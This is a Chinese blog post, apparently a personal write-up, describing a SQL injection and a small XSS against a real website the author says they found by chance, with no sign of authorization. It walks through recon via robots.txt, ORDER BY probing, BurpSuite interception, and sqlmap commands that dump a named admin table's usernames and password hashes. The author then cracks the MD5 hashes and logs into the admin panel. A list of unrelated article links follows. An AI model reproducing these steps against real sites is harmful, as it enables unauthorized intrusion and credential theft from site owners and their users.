真实sql注入以及小xss--BurpSuite联动sqlmap篇

前几天漏洞检测的时候无意发现一个sql注入

首先我先去网站的robots.txt去看了看无意间发现很多资产

而我意外发现admin就是后台

之后我通过基础的万能账号密码测试or ‘1‘=’1也根本没有效果

而当我注入列的时候情况出现了

出现了报错,有报错必有注入点

因此我尝试了注入,在order by 1和order by 2的时候是没有报错的,而3就有了证明一件事情,表格是两列,咱们暂且确定他是user列和password当然是我猜的

那既然这样直接开启BurpSuite去进行抓包

很明显我输入的已经到里面了,我们现在尝试更改命令为查询语句

好了版本信息出来了SQL Server 2008 10.50.1600.1

那我们继续去查用户一般来说公司内部都是user

很明显用户的名称出现了

那就ok了,我们直接去sqlmap爆破即可,这里提示一个小点,BurpSuite联合sqlmap使用,将数据包导出来然后导入sqlmap目录下使用

sqlmap -r 1.txt -p username --dbs

数据库

查表

​
sqlmap -r 3.txt -p username -D qds131170580_db -T Admin_infor --columns

之后查询表中数据列名

sqlmap -r 3.txt -p username -D qds131170580_db -T Admin_infor --dump -C "Name,Pwd"

查看name和passowrd,爆数据了

成功解密

解密MD5好用的网站:MD5免费在线解密破解_MD5在线加密-SOMD5

成功进入

xss在搜索上面进入<a>标签

实现

相关推荐

  1. SQL注入漏洞扫描---sqlmap

    2024-03-30 05:58:02       37 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-30 05:58:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-30 05:58:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-30 05:58:02       82 阅读
  4. Python语言-面向对象

    2024-03-30 05:58:02       91 阅读

热门阅读

  1. IDEA 打包jar

    2024-03-30 05:58:02       43 阅读
  2. idea常用的快捷键总结:

    2024-03-30 05:58:02       30 阅读
  3. ReactNative实现图片上传功能(兼容安卓和ios)

    2024-03-30 05:58:02       37 阅读
  4. 基于卷积神经网络的物体检测技术

    2024-03-30 05:58:02       37 阅读
  5. 如何利用ChatGPT提升学术论文写作效率

    2024-03-30 05:58:02       39 阅读
  6. 零基础机器学习(6)之岭回归与套索回归(正则化)

    2024-03-30 05:58:02       31 阅读
  7. gdb | 实战调试死循环

    2024-03-30 05:58:02       35 阅读
  8. 山峰三元组问题的O(n)解法

    2024-03-30 05:58:02       40 阅读
  9. 汽车电子行业知识:什么是车联网V2X技术

    2024-03-30 05:58:02       40 阅读
  10. elementUI 输入框按回车刷新页面问题

    2024-03-30 05:58:02       40 阅读
  11. 视频主题分类

    2024-03-30 05:58:02       43 阅读
  12. 机器学习概念、分类、步骤、和实现

    2024-03-30 05:58:02       38 阅读